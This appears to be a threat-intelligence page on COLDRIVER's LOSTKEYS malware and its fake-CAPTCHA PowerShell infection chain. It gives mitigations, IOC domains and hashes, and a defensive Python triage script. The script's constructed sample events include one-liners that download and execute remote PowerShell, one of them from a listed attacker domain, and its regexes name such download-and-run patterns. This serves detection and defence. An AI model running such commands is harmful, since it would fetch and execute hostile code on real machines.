COLDRIVER Using New Malware To Steal Documents From Western Targets and NGOs
Russian government-backed threat group COLDRIVER has developed a new malware family called LOSTKEYS, capable of stealing files and system information. The group targets high-profile individuals, NGOs, and former intelligence officers through credential phishing and, more recently, malware delivery. LOSTKEYS is delivered through a multi-step infection chain that starts with a fake CAPTCHA page and relies on PowerShell commands for the intermediate stages. The malware checks for virtual machine environments before running and decodes its final payload with a substitution cipher. COLDRIVER's primary goal is intelligence collection for Russia's strategic interests, targeting Western governments, militaries, journalists, and Ukraine-related individuals. The group has been linked to hack-and-leak campaigns in the UK and against NGOs.
AI Analysis
Technical Summary
COLDRIVER (also tracked as UNC4057, Star Blizzard and Callisto) is a Russian government-backed actor whose core tradecraft is credential phishing; LOSTKEYS is a new malware family the group has started to deploy for espionage and document theft. Targets are Western governments and militaries, journalists, think tanks, NGOs and individuals connected to Ukraine, including former intelligence officers. The observed chain does not start with an exploit but with a lure website showing a fake CAPTCHA that asks the visitor to paste a PowerShell command into the Windows Run dialog (the "ClickFix" pattern); that pasted command fetches the next PowerShell stages from attacker infrastructure. The second stage fingerprints the host (the referenced GTIG write-up reports a check on the display resolution) and exits on values that match common analysis sandboxes, so automated detonation often sees nothing past that point. The final payload is a Visual Basic Script that is reconstructed at runtime with a substitution cipher, which keeps the decoded script out of the intermediate stages and defeats simple string matching on them. Once running, LOSTKEYS collects files from a hard-coded list of extensions and directories, together with system information and the list of running processes, and sends them to the command-and-control server. The pulse maps the activity to MITRE ATT&CK T1566 (Phishing), T1059.001 (PowerShell), T1005 (Data from Local System) and T1102 (Web Service); T1204.004 (User Execution: Malicious Copy and Paste), T1059.005 (Visual Basic) and T1497 (Virtualization/Sandbox Evasion) also apply. There is no vulnerability to patch: every step of the chain depends on user interaction, so the controls that matter sit on the endpoint and in the mail and web path. The referenced report places observed use in early 2025, which together with the actor's history and targeting makes the threat credible.
Potential Impact
For European organizations, especially governmental bodies, NGOs, and entities involved in Ukraine-related activities, the impact of LOSTKEYS can be significant. The theft of sensitive documents and credentials can expose confidential information and undermine operational security and diplomatic efforts. Intelligence gathered through this malware could be used to influence political decisions, disrupt military operations, or damage reputations through subsequent leak campaigns, which is consistent with COLDRIVER's earlier hack-and-leak activity. NGOs working on human rights or in conflict zones may face operational setbacks and loss of donor trust if their data is compromised. The sandbox checks and runtime decoding increase the risk of a prolonged undetected presence on compromised hosts, amplifying the potential damage. Additionally, the targeting of former intelligence officers and journalists suggests a broad scope that could affect information dissemination and public awareness in Europe.
Mitigation Recommendations
Defenses should map to the chain described above rather than to generic phishing advice. Because the chain starts with the user pasting a command into the Run dialog, the highest-value controls are the ones that break that step: remove the Run dialog where users do not need it (the "Remove Run menu from Start Menu" policy, which sets NoRun under HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer), and train users that no legitimate CAPTCHA ever asks them to press Win+R or paste text. On the endpoint, turn on PowerShell Script Block Logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) and module logging, and have the EDR or SIEM alert on powershell.exe or pwsh.exe spawned by explorer.exe, on hidden-window or encoded-command flags, and on PowerShell reaching out to newly seen domains; block the two domains in this page's IOC list at the proxy and the DNS resolver. Enforce application control (AppLocker or WDAC) in enforcement mode, which also puts PowerShell into Constrained Language Mode and stops the downloaded PowerShell and VBScript stages from running as unrestricted code. Sandboxes used for triage should present a realistic, non-default display resolution and hardware profile, since the second stage fingerprints the host and exits in a recognisable VM; manual analysis of the pulled-down stages is more reliable than automated detonation here. Because COLDRIVER's main business remains credential phishing, require phishing-resistant MFA (FIDO2 security keys or passkeys) for the people most likely to be targeted, audit and minimise administrative privileges, and have a plan for rotating credentials and revoking sessions once a compromise is suspected. Finally, share COLDRIVER and LOSTKEYS indicators and TTPs with national CERTs and sector ISACs to improve collective defense.
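The explorer.exe-to-PowerShell and command-line checks above, worked through as an added example (this is not code from the GTIG report or from the OTX pulse). It scores simplified process-creation events of the kind Sysmon Event ID 1 or Windows 4688 produce; the field names, the token list and every sample event are constructed for the example, and the only values taken from this page are the two IOC domains:

```python
"""Triage of process-creation events for a ClickFix-style LOSTKEYS stage 1.

Added example for this page; not code from the GTIG report or the OTX pulse.
Event fields mirror a simplified Sysmon Event ID 1 / Windows 4688 record and
every sample event below is constructed. The two domains are the ones listed
in this page's IOC section.
"""
import base64
import re
from pathlib import PureWindowsPath
from typing import Optional

IOC_DOMAINS = {"cloudmediaportal.com", "njala.dev"}

# Tokens a pasted Run-dialog one-liner tends to carry (assumed list; tune per environment).
SUSPICIOUS_TOKENS = {
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "execution policy bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "invoke-expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "web download": re.compile(r"invoke-webrequest|\biwr\b|downloadstring|net\.webclient", re.I),
    "base64 decode": re.compile(r"frombase64string", re.I),
}
# -EncodedCommand and its unambiguous prefixes, followed by the base64 blob.
ENCODED_RE = re.compile(r"-e(?:ncodedcommand|ncoded|nc|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)
POWERSHELL = {"powershell.exe", "pwsh.exe"}


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of an -EncodedCommand argument (base64 of UTF-16LE), if present."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(event: dict) -> dict:
    """Score one process-creation event; higher means closer to the observed chain."""
    image = PureWindowsPath(event["image"]).name.lower()
    if image not in POWERSHELL:
        return {"score": 0, "reasons": [], "decoded": None}
    score, reasons = 0, []
    parent = PureWindowsPath(event["parent"]).name.lower()
    if parent == "explorer.exe":
        # A command pasted into Win+R runs as a child of explorer.exe; admins
        # normally start PowerShell from a terminal, a console host or a task.
        score += 3
        reasons.append("powershell spawned by explorer.exe (Run dialog pattern)")
    decoded = decode_encoded_command(event["cmdline"])
    text = event["cmdline"] + ("\n" + decoded if decoded else "")
    if decoded:
        score += 1
        reasons.append("encoded command (decoded for inspection)")
    for name, pat in SUSPICIOUS_TOKENS.items():
        if pat.search(text):          # decoded text is scanned as well
            score += 1
            reasons.append(name)
    hits = sorted(d for d in IOC_DOMAINS if d in text.lower())
    if hits:
        score += 5
        reasons.append("IOC domain: " + ", ".join(hits))
    return {"score": score, "reasons": reasons, "decoded": decoded}


def verdict(score: int) -> str:
    return "alert" if score >= 4 else "review" if score else "clean"


def _b64_utf16(ps: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects (constructed input)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


SAMPLE_EVENTS = [  # constructed, not captured telemetry
    {"host": "ws01", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -ep bypass -c "iex (iwr https://cloudmediaportal.com/check -UseBasicParsing).Content"'},
    {"host": "ws02", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\scripts\inventory.ps1"},
    {"host": "srv01", "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "cmdline": "pwsh.exe -NoProfile -EncodedCommand "
                + _b64_utf16("IEX (New-Object Net.WebClient).DownloadString('https://intranet.example/update.ps1')")},
    {"host": "ws03", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "cmdline": "firefox.exe https://example.org/"},
]


def triage_all(events=SAMPLE_EVENTS):
    """Return (host, verdict, score, reasons) for every event."""
    out = []
    for ev in events:
        r = triage(ev)
        out.append((ev["host"], verdict(r["score"]), r["score"], r["reasons"]))
    return out


if __name__ == "__main__":
    for host, v, score, reasons in triage_all():
        print(f"{host:6} {v:6} score={score:<2} {'; '.join(reasons) or '-'}")
```

The scoring is deliberately coarse: the explorer.exe parent and an IOC domain hit are weighted so that either one plus a couple of command-line tokens crosses the alert threshold, while an encoded but otherwise unremarkable scheduled-task command lands in the review tier. Real deployments should feed the decoded command text into the same rules used for Script Block Logging events, since the pasted one-liner is only the first of several stages.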
Affected Countries
United Kingdom, Germany, France, Poland, Ukraine, Netherlands, Belgium, Sweden
Technical Details
- Author: AlienVault
- TLP: white
- References: https://cloud.google.com/blog/topics/threat-intelligence/coldriver-steal-documents-western-targets-ngos
- Adversary: COLDRIVER
- Pulse Id: 681ba0e01c36344c7ac60892
- Threat Score: not provided (null)
Indicators of Compromise
Domain
Value | Description
---|---
cloudmediaportal.com | listed in the pulse without a description
njala.dev | listed in the pulse without a description
Hash
The pulse lists MD5, SHA1 and SHA256 values and, for most of them, states which values belong to the same sample; those are grouped one sample per row.
SHA1 | MD5 | SHA256
---|---|---
0ac32fd4e6ef96163084fdb09d05e1ae7124e6d9 | 688c01c49525df877d4bc28aa534d31d | 6bc411d562456079a8f1e38f3473c33ade73b08c7518861699e9863540b64f9a
56b0d6d7fb81b77c0713361f0b95994d19414bf1 | aef72f5dcdf97aa2970a76ababe6b640 | 8af28bb7e8e2f663d4b797bf3ddbee7f0a33f637a33df9b31fbb4c1ce71b2fee
94bfd6fba2dec53a4df9b815d1f7dc150b37d4af | 15ecd6b5a2df7ccabbab3cd3b42c443d | 4c7accba35edd646584bb5a40ab78f963de45e5fc816e62022cd7ab1b01dae9c
bd907c2512facbeef31d4e683828dfece01849e2 | da8b74efc6f4ff7491829c6745da220c | 3233668d2e4a80b17e6357177b53539df659e55e06ba49777d0d5171f27565dd
de2e039c69f6f4f5af23d4eac2d3235e2ce4f20c | f91705e56983ba3c3cd940d62bc2ed35 | 28a0596b9c62b7b7aca9cac2a07b067109f27d327581a60e8cb4fab92f8f4fa9
e7b6bfbfb6e496e57ceaba00fabe7df1d6b5061c | 09b740bb082b465fcc9f8a7766984317 | 6b85d707c23d68f9518e757cc97adb20adc8accb33d0d68faf1d8d56d7840816
ff9824395c18e1cf70960862654eb0a8b012eeaa | de4bf7af4195667a6710f7ad56bf52c0 | 13f7599c94b9d4b028ce02397717a1282a46f07b9d3e2f8f2b3213fa8884b029
Hashes the pulse does not tie to another value:
Type | Value
---|---
MD5 | 6d23b468ea963bfa21a29891217d6a86
MD5 | dee8d82d931f91d94086dc3d8e56394f
SHA1 | 3c4a0f254b598c107c8b3375ab4cd5c9c7717587
SHA1 | a408c34b61d82b05838be1cc3862656db25a4cfe
SHA256 | 02ce477a07681ee1671c7164c9cc847b01c2e1cd50e709f7e861eaab89c69b6f
SHA256 | b55cdce773bc77ee46b503dbd9430828cc0f518b94289fbfa70b5fbb02ab1847
Threat ID: 68421305182aa0cae2f2a22d
Added to database: 6/5/2025, 9:58:29 PM
Last enriched: 7/7/2025, 5:26:14 PM
Last updated: 8/14/2025, 11:27:23 PM